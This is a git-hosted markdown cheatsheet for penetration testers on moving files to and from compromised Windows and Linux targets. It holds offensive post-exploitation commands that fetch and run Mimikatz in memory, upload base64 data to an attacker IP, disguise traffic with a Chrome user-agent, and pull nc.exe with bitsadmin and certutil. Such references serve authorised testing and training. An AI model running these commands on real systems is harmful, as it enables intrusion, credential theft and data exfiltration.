daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

file-transfers.md (2026B)


      1 ---
      2 title: "File Transfers"
      3 description: "Move files to/from targets on Windows/Linux: HTTP, SMB, certutil, base64, nc and living-off-the-land."
      4 category: tools
      5 tags: [post-exploitation, file-transfer, windows, linux]
      6 tools: [certutil, wget, nc, smbserver]
      7 difficulty: intermediate
      8 updated: "2026-08-09"
      9 source: "repo:HTB/cheatsheet-file-transfers.pdf"
     10 ---
     11 
     12 # File Transfers
     13 
     14 Quick reference for moving files to and from a target during an engagement, using built-in / living-off-the-land utilities on Windows and Linux. Replace `10.10.10.32` / `<snip>` with your attacker host and hosted-file URL.
     15 
     16 ---
     17 
     18 ## Windows — PowerShell
     19 
     20 ```powershell
     21 # Download a file with PowerShell
     22 Invoke-WebRequest https://<snip>/PowerView.ps1 -OutFile PowerView.ps1
     23 
     24 # Execute a file in memory (no disk write)
     25 IEX (New-Object Net.WebClient).DownloadString('https://<snip>/Invoke-Mimikatz.ps1')
     26 
     27 # Upload a file with PowerShell (POST body)
     28 Invoke-WebRequest -Uri http://10.10.10.32:443 -Method POST -Body $b64
     29 
     30 # Download with a Chrome User-Agent (blend in with normal traffic)
     31 Invoke-WebRequest http://nc.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "nc.exe"
     32 ```
     33 
     34 ---
     35 
     36 ## Windows — Living Off The Land Binaries
     37 
     38 ```powershell
     39 # Download using Bitsadmin
     40 bitsadmin /transfer n http://10.10.10.32/nc.exe C:\Temp\nc.exe
     41 
     42 # Download using Certutil
     43 certutil.exe -verifyctl -split -f http://10.10.10.32/nc.exe
     44 ```
     45 
     46 ---
     47 
     48 ## Linux
     49 
     50 ```bash
     51 # Download using wget
     52 wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh
     53 
     54 # Download using cURL
     55 curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
     56 
     57 # Download using PHP
     58 php -r '$file = file_get_contents("https://<snip>/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);'
     59 ```
     60 
     61 ---
     62 
     63 ## SCP (SSH)
     64 
     65 ```bash
     66 # Upload a file to a target
     67 scp C:\Temp\bloodhound.zip user@10.10.10.150:/tmp/bloodhound.zip
     68 
     69 # Download a file from a target
     70 scp user@target:/tmp/mimikatz.exe C:\Temp\mimikatz.exe
     71 ```